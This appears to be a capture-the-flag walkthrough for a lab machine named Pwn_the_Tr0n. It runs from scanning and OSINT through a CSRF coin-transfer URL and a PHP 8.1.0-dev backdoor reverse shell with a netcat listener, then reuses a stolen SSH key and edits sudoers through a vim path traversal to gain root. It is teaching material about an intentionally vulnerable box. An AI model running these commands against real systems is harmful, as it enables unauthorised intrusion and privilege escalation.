Pwn_the_Tr0n Walk-through

Hello Guys, In this write up I’m going to write about Pwn_the_Tr0n Machine.

Machine Level: Medium

Box Made By: Sachin Sharma , Manjunathan

The first thing is all about scanning. Find the IP address of the machine Using netdiscover

netdiscover -p

netdiscover -p

After finding IP let’s start our usual process. Perform a basic NMAP scan

nmap -A -sV <IP_addr>

In this we can see there are 2 ports are opened.when we try to login via ssh it asks password. So look for other method. Visit the IP of the machine.You’ll find a web page with contains some info about the concept machine. We can’t get any hints from this page. So go with usual method FUZZING.

dirb http://<ip_addr>

It shows some directories. all the directories returns 403-Access Forbidden. But there is one directory names Travel and when we visit the directory some juicy info found like a hash and some info

Travel

Here we found Some info.

Hash

Encrypted Message

Format of Message after decrypting the encryption key

And the string named @decepticon-base like a user name

Try to crack the hash. But no use It takes much time or not working. So Move to get any other hints.The \@decepticon-base looks like Username. Try to find out the Username Everywhere. Check it using google dorks but no use. So use any other tools to find it out. I used sherlock and I found the github username with decepticon-base

Check the github user name. we found a folder named iacon in projects folder. But it shows as <<<< DELETED >>>>
So try to find out anyways to get what was present there. use Way-back machine to get the file. As per our hint we got /iacon_code/(capital_of_country)/Latitude_{}.{}-Longitude_{}.{}.txt. So let make a wordlist with capital of all the countries.still we didn’t found the last thing Latitude_{}.{}-Longitude_{}.{}.txt. We need to find what will comes in the place of “{}” So let’s make a script to crack the hash

Wordlist-Capital
Code From wayback machine
md5.py
Output of the Script

We already know the code,capital and decrypted message format. While decrypt the hash using the script we found a path R3LIC-1337/Tokyo/Latitude_95.37-Longitude_95.37.txt, contains our 1st flag and hint to the next flag

Flag-1

Okay now go to the next part,visit the URL given.<Ip_addr>/W4RSHIP_Sh0P.php. It will get you into a shop

Check the full page for hint, after checking all the part we got some info.

we need to buy the secret item, to get hint

there is an login panel found for non-users who needs to create the account

Secret cost is about 9999.

Okay try to buy the secret item but it said LOGIN FIRST, and it redirects you t to login panel. Using that create an account.After creating you’ll find dashboard. and try to buy the item again, but this time it returns “Not enough Coins”. So let’s try other methods, In dashboard we can find “Transfer Coins to a Friend in need?”, But It returns “Request cannot be entertained” all the time. In about section we can find another hint as “Only admin can transfer coins”. Note the money transfer URL

It looks like “http://<Ip_addr>/W4RSHIP_Sh0P_transfer.php?to=cool&amount=9999&from=cool” try to trick like changing the “from” to admin but not working. try to buy other 2 but same problems occurs. to check what happened, check the source code of the money transform page, while checking we will find out there will no action for money transfer. so spending time on money transfer page is no need. What we need to do right now?

Check other possible ways to transfer money. in shop page there is contact-us form. check the source code. it has some working functionality. try to send money via contact us form. but no use it returns thanks for contacting us.

It about we will see the word “only Admin can transfer Energon coins between accounts” Also we get the usernames of the 3 in-charge persons from source code.the admin’s username is “admin_boss”. So let try in username field fill all three usernames and fill the amount 9999 but no use it still returns “Thank you for CONtacting us.” Now just think Out of the box, as per the hint only admin can send the request to send money, We’ll get the request URL from transform amount page as follows

http://<IP_Addr>/W4RSHIP_Sh0P_transfer.php?to=user&amount=9999&from=user

Send the request via contact-us Page like CSRF. Instead of message we send amount transfer. Note that only admin can send money request. so in username put admin_boss (Admin) and in message section send the URL request as

http://<IP_Addr>/W4RSHIP_Sh0P_transfer.php?to=user&amount=9999&from=admin_boss

This time it said almost there. but unable to send money so, this page has CSRF on Contact us page. Let change the from account names one by one which we will found from the In-charge persons

When the request change as from=lord_starscream.It will transfer the money.The request is

http://<IP_Addr>/W4RSHIP_Sh0P_transfer.php?to=user&amount=9999&from=lord_starscream

That’s all amount transferred

Amount Transferred

Now You can Buy the item and Got the next hint

Now you got the credentials as

Purchase Successful!Megatron Login Panel URL: /M3G4TR0N_SUPR3M3/login.php Username = L0RD_M3G4Tr0N Password = freakishlylongpasswordforl0gin

Now Sign out the page and Login in given login panel URL using the Credentials. That’s all you’ll get logged in and Found the flag

Flag-2

check the source code,storage, network tab also.Intercept the request and response. while checking it we found one thing that is the PHP version “X-Powered-By:PHP/8.1.0-dev” . Php version 8.1.0 is vulnerable to “Remote Code Execution” Check for the Exploit in the Internet. there is 2 exploits found.

https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py

https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py

Check both the exploits.
Reverse Shell Exploit works fine with netcat

NetCat: nc -lvnp <port_number>

Rev shell Exploit: python3 reverse_shell_code.py <URL of the page> <IP_Addr> <port_number>

that’s all got the shell.

Check for the flag files. while checking the Home directory we found 2 folders named as megatr0n,soundwave. Check both the directories we found Flag3.txt file in soundwave directory. But the permission denied

Access Denied

So check for other files, while checking we found ssh keys and we can open it.

.ssh

Check the identity file may contains some info.Great we got ssh key.Now search for any other data

We can’t do anything more from here. So let’s try other methods. we got ssh key of the user soundwave only. In NMAP scanning we found that SSH port is open so try to login via ssh with the captured ssh key

ssh -i ssh_key.pem soundwave@<IP_Addr>

Got the proper shell and check the Flag3.txt file and you’ll get the 3rd flag

Flag-3

The last Thing is find root flag which will done by privilege escalation. Now check the permissions of the soundwave

Permissions

Try to login as root with sudo -i. but access denied. It shows there is no root permission for soundwave to read and write the files until he access the files from /var/Decepticon/. Actually it is a basic logic,But you can see this logic rarely even in HTB

So lets try to access the files from /var/Decepticon/ , as follow

sudo vim /var/Decepticon/../../etc/sudoers

Oh Cool!!!! It works!!!

So let’s try to disable password for root from above file by add the Following lines which will disable the root password

soundwave ALL=(ALL) NOPASSWD:ALL

and comment the password following command

soundwave ALL= NOPASSWD: /usr/bin/vim /var/Decepticon/*

Now try to login as root with this command

sudo -i

Boooooooom! Got the root shell!!!💥💥💥

That’s all we got the root access, And check for root flag and open it. You’ll got the root flag also

Thank You Guys! Give us your big Support to us!we will meet on another Write-up